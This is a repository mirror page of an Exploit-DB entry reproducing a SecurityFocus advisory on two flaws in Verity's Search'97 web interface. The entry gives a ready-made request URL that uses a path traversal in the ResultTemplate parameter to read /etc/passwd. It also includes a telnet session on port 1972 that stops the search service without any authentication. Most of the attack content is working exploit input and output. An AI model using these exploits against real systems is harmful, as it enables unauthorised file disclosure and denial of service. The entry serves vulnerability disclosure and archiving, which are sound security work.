bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/remote/19127.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

29 lines
No EOL
1 KiB
Text
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/162/info
A pair of vulnerabilities exist in Verity's Search`97 web interface to the Verity search engine. The first vulnerability is due to cgi-bin scripts, s97_cgi and s97r_cgi failing to check for the existence of certain shell meta characters. This allows an attacker to access any file on the file system.
The second vulnerability is due to a lack of authentication being used to access the Verity administrative program. Any user can telnet to the appropriate port, and issue a command to shut the Verity software down.
s97_cgi:
http://www.xxx.com/search97.vts
?HLNavigate=On&querytext=dcm
&ServerKey=Primary
&ResultTemplate=../../../../../../../etc/passwd
&ResultStyle=simple
&ResultCount=20
&collection=books
tasmgr:
telnet to port 1972
0 Verity dcm ready
list
0 TAS-Primary
status tas-primary
0 TYPE=PROCESS; STATE=RUNNING; STARTUP=AUTO_START; PID=87632
stop tas-primary
0 'tas-primary' signalled
status tas-primary
0 TYPE=PROCESS; STATE=STOPPING; STARTUP=AUTO_START; PID=87632
where
0 /home/verity/_hpux10/bin/dcm.cfg
Reference in a new issue View git blame Copy permalink